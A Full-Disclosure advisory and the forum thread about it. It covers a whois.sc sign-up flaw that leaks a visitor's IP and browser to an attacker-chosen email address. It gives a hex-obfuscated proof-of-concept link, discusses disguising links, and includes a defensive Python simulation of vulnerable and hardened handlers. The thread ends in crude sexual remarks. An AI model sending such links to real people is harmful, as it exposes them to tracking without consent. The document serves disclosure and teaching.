Title: whois.sc not-big-deal hole

Server-side risk: none
Client-side risk: low risk (private info revealed about the user)

Description:

This might not even be considered a proper security hole, but I thought it's an interesting way to get the following information about a user:

- IP Address
- Operating system
- Web browser version

This information can be easily obtained by "tricking" someone to visit your website and then checking the webserver logs. Email headers also help, not to mention loud OS detection tools such as xprobe2 and nmap (which will only work if you're lucky and the "victim" doesn't use a firewall blocking all incoming traffic).

In this case however, the scenario is a little different because we use a sign-up service provided by an existing website for our own purposes (enumeration).

The only limitation of this "trick" is that the attacker needs to use a different email address for each attack. This is because whois.sc will set the account activation status to "pending" after requesting the account activation with your email address for the first time.

The original request to sign-up for an account is a POST request *similar* to the following:

POST http://www.whois.sc/members/process.html HTTP/1.1
Host: www.whois.sc
Content-Length: 48

action=newaccount&doneurl=&email=test%40test.com

However, we can change the request from POST to GET and the application will happily process the query:

http://www.whois.sc/members/process.html?action=newaccount&doneurl=%252Freverse-ip%252F&email=test%40test.com

PoC:

http://www.whois.sc/members/process.html?action=newaccount&doneurl=%252Freverse-ip%252F&email=attacker%40evilmail.com

Replace "attacker%40evilmail.com" in the previous link with your own email address (e.g.: myself%40gmail.com) and send it to the "victim".

Also, we could obfuscate our email address by encoding it to hex:

http://www.whois.sc/members/process.html?action=newaccount&doneurl=%252Freverse-ip%252F&email=%61%74%74%61%63%6B%65%72%40%65%76%69%6C%6D%61%69%6C%2E%63%6F%6D

Note: "%40" is "@" in hex. For a good resource to convert strings to different encodings check out http://www.thedumbterminal.co.uk/php/stringdecode.php

Regards,
pagvac
Earth, SOLAR SYSTEM

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
---------------------------------------------------
NOTE: You received this message because someone from
142.161.170.11 (Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8b5) Gecko/20051025 Firefox/1.4.1)
requested an account for this email address. If you
did not request this account please ignore this message
and you will not be contacted again.
---------------------------------------------------
Just goes to show the problem with using something like $_REQUEST instead of $_POST in PHP.
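The advisory's GET-for-POST trick and the $_REQUEST-versus-$_POST point from the reply above, modelled in Python as an added example (this is not whois.sc's code, nor code from pagvac's post or from this thread). The two handlers stand in for PHP that reads $_REQUEST (GET and POST merged, method never checked) and PHP that reads only $_POST and requires a session-bound CSRF token; the victim's IP, User-Agent and the session token are constructed values. The simulation also covers the variant argued about further down the thread, a form on an attacker's own site that auto-submits a POST, which the hardened handler rejects for lack of the token.

```python
"""The whois.sc sign-up flow from pagvac's advisory, modelled in Python.

Constructed example: the handlers below are stand-ins for PHP code that
reads $_REQUEST (GET and POST merged) versus $_POST plus a CSRF token;
they are not whois.sc's code. Client IP, User-Agent and token are made up.
"""
import secrets
from urllib.parse import parse_qs, urlsplit


def parse_request(method, url, body=""):
    """Split a request into what a web framework hands the handler:
    method, path, percent-decoded query parameters and form fields."""
    parts = urlsplit(url)
    query = {k: v[0] for k, v in parse_qs(parts.query).items()}
    form = {k: v[0] for k, v in parse_qs(body).items()} if body else {}
    return {"method": method, "path": parts.path, "query": query, "form": form}


def activation_mail(email, client_ip, user_agent):
    """The line the activation e-mail quotes back to the address holder.
    Whoever chose `email` learns the requester's IP and browser."""
    return {"sent_to": email,
            "note": f"someone from {client_ip} ({user_agent}) requested an account"}


def newaccount_vulnerable(req, client_ip, user_agent):
    """$_REQUEST-style handling: query string and body are merged and the
    method is never checked, so a plain link triggers the action."""
    params = {**req["query"], **req["form"]}
    if params.get("action") != "newaccount" or "email" not in params:
        return None
    return activation_mail(params["email"], client_ip, user_agent)


def newaccount_hardened(req, client_ip, user_agent, session_token):
    """$_POST-only handling plus a CSRF token tied to the visitor's session.
    A GET link carries no body, and a cross-site form cannot know the
    token, so neither path reaches activation_mail()."""
    if req["method"] != "POST":
        return None
    form = req["form"]
    if form.get("action") != "newaccount" or "email" not in form:
        return None
    if not secrets.compare_digest(form.get("csrf", ""), session_token):
        return None
    return activation_mail(form["email"], client_ip, user_agent)


# The obfuscated PoC link from the advisory: the e-mail is percent-encoded
# byte by byte and doneurl is double-encoded.
POC_LINK = ("http://www.whois.sc/members/process.html?action=newaccount"
            "&doneurl=%252Freverse-ip%252F"
            "&email=%61%74%74%61%63%6B%65%72%40%65%76%69%6C%6D%61%69%6C%2E%63%6F%6D")
SIGNUP_URL = "http://www.whois.sc/members/process.html"

VICTIM_IP = "192.0.2.10"                             # constructed
VICTIM_UA = "Mozilla/5.0 (X11; Linux) Example/1.0"   # constructed
SESSION_TOKEN = "constructed-session-token"          # random per session in practice


def decode_link(link):
    """What the link really submits once the percent-encoding is undone."""
    return parse_request("GET", link)["query"]


def victim_clicks(link, hardened=False):
    """Simulate the victim following a link: a GET with no body, no token."""
    req = parse_request("GET", link)
    if hardened:
        return newaccount_hardened(req, VICTIM_IP, VICTIM_UA, SESSION_TOKEN)
    return newaccount_vulnerable(req, VICTIM_IP, VICTIM_UA)


def cross_site_form_post(email):
    """A POST auto-submitted from an attacker's page: right method, right
    fields, but the attacker cannot read the victim's session token."""
    body = f"action=newaccount&doneurl=&email={email.replace('@', '%40')}"
    req = parse_request("POST", SIGNUP_URL, body)
    return newaccount_hardened(req, VICTIM_IP, VICTIM_UA, SESSION_TOKEN)


def legitimate_signup(email):
    """The intended flow: a POST from the site's own form, token included."""
    body = (f"action=newaccount&doneurl=&email={email.replace('@', '%40')}"
            f"&csrf={SESSION_TOKEN}")
    req = parse_request("POST", SIGNUP_URL, body)
    return newaccount_hardened(req, "198.51.100.7", "Mozilla/5.0 (example)", SESSION_TOKEN)


if __name__ == "__main__":
    print("link submits :", decode_link(POC_LINK))
    print("vulnerable   :", victim_clicks(POC_LINK))
    print("hardened GET :", victim_clicks(POC_LINK, hardened=True))
    print("cross-site   :", cross_site_form_post("attacker@evilmail.com"))
    print("legit POST   :", legitimate_signup("test@test.com"))
```

Run it and the first line shows that the hex-encoded link submits plain `attacker@evilmail.com` (and `doneurl` drops one layer of encoding to `%2Freverse-ip%2F`); the vulnerable handler then "mails" the victim's address and browser string to that attacker address, while the hardened handler returns None for both the GET link and the forged cross-site POST and only accepts the site's own form. Checking the method alone is not enough, which is why the token is there: a cross-site POST has the right method but cannot carry a secret the attacker never saw.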
To spoof POST variables, you'd have to have a website, and convince them to click a "submit" button. With GET variables, you can give them an obfuscated link, which could be done on an IM, a forum, in an email, etc.. And on IE for sure, there are several ways to hide where a link is actually sending you to.
Quote from: iago on November 05, 2005, 03:01:45 pm
    To spoof POST variables, you'd have to have a website, and convince them to click a "submit" button. With GET variables, you can give them an obfuscated link, which could be done on an IM, a forum, in an email, etc.. And on IE for sure, there are several ways to hide where a link is actually sending you to.

I kind of misunderstood the exploit, but now I see what it's doing. Additionally, you could send them to a link on your site (containing the proper information), which submits a POST form to that website containing information in the URL you sent the person you're attacking.
True, but you still need to control a site. :-P

Yes, your way is possible, but much harder to "exploit".
Then can you post a link on this forum that'll do it for me, without going through your own site? Can you email me a link that'll do it without going through another site? Can you IM or PM me a link that'll do it, without going through another site? And, if you're going through your own site, then you can check the logs anyway, so you aren't gaining any advantage.
Quote from: iago on November 05, 2005, 06:10:20 pmThen can you post a link on this forum that'll do it for me, without going through your own site? Can you email me a link that'll do it without going through another site? Can you IM or PM me a link that'll do it, without going through another site? And, if you're going through your own site, then you can check the logs anyway, so you aren't gaining any advantage. Where in your first proposition did you say I couldn't use my own website?
Quote from: Sidoh on November 05, 2005, 06:22:38 pm
    Quote from: iago on November 05, 2005, 06:10:20 pm
        Then can you post a link on this forum that'll do it for me, without going through your own site? Can you email me a link that'll do it without going through another site? Can you IM or PM me a link that'll do it, without going through another site? And, if you're going through your own site, then you can check the logs anyway, so you aren't gaining any advantage.

    Where in your first proposition did you say I couldn't use my own website?

Quote from: iago on November 05, 2005, 04:03:27 pm
    True, but you still need to control a site. :-P

    Yes, your way is possible, but much harder to "exploit".
Quote from: iago on November 05, 2005, 07:04:09 pm
    Quote from: Sidoh on November 05, 2005, 06:22:38 pm
        Quote from: iago on November 05, 2005, 06:10:20 pm
            Then can you post a link on this forum that'll do it for me, without going through your own site? Can you email me a link that'll do it without going through another site? Can you IM or PM me a link that'll do it, without going through another site? And, if you're going through your own site, then you can check the logs anyway, so you aren't gaining any advantage.

        Where in your first proposition did you say I couldn't use my own website?

    Quote from: iago on November 05, 2005, 04:03:27 pm
        True, but you still need to control a site. :-P

        Yes, your way is possible, but much harder to "exploit".

I do control a site and it's still possible! T_T

Hehe, this is a pretty useless argument, though. I think it'd be just as easy to trick someone into visiting your website so you could log their IP address.
Who gives a damn? I fuck sheep all the time.
And yes, male both ends. There are a couple lesbians that need a two-ended dildo...My router just refuses to wear a strap-on.